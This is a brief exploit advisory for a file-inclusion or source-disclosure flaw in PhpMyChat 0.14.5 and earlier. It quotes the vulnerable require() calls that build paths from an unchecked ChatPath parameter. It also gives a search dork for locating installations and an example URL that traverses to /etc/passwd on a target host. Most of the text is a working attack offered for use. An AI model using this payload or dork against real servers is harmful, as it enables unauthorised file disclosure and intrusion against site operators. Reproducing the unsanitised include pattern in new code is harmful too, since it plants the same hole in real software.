******************************************************************************* # Title : PhpMyChat <= 0.14.5 Source Code Disclosure Vulnerability # Author : ajann # Dork : phpMyChat 0.14.5 , phpMyChat # Vuln; ******************************************************************************* [File] localization/languages.lib.php3 [/File] [Code,1] languages.lib.php3 Error: .. .... require("./${ChatPath}config/config.lib.php3"); require("./${ChatPath}lib/database/".C_DB_TYPE.".lib.php3"); require("./${ChatPath}lib/clean.lib.php3"); .... .. Key [:] ChatPath=[file] \Example: http://target.com/path/localization/languages.lib.php3?ChatPath=../../etc/passwd # ajann,Turkey # ... # Im not Hacker!